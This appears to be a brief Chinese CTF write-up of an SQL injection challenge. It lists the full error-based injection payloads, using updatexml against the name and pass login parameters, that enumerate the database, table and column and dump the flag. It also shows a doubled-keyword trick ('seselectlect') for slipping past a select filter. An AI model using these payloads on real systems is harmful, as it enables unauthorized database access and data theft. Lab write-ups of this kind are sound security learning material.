sql注入-2
根据网页源代码hint添加get型参数tips
bp抓包,可以发现存在两个post型参数,name和pass,尝试了一番union联合查询注入,无法利用,遂改报错注入,这里使用updatexml
发现可以正常注入
name=admin' and updatexml(1,concat(0x7e,(select 1),0x7e),1)#&pass=111111
查当前数据库 note
name=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&pass=111111
查表(note) fl4g
name=admin' and updatexml(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema='note' limit 0,1),0x7e),1)#&pass=111111 //失败,可能过滤了一些字符
name=admin' and updatexml(1,concat(0x7e,(seselectlect concat(table_name) from information_schema.tables where table_schema='note' limit 0,1),0x7e),1)#&pass=111111 //双写select绕过
查字段(fl4g) flag
name=admin' and updatexml(1,concat(0x7e,(seselectlect concat(column_name) from information_schema.columns where table_name='fl4g' limit 0,1),0x7e),1)#&pass=111111
dump数据
name=admin' and updatexml(1,concat(0x7e,(seselectlect flag from fl4g),0x7e),1)#&pass=111111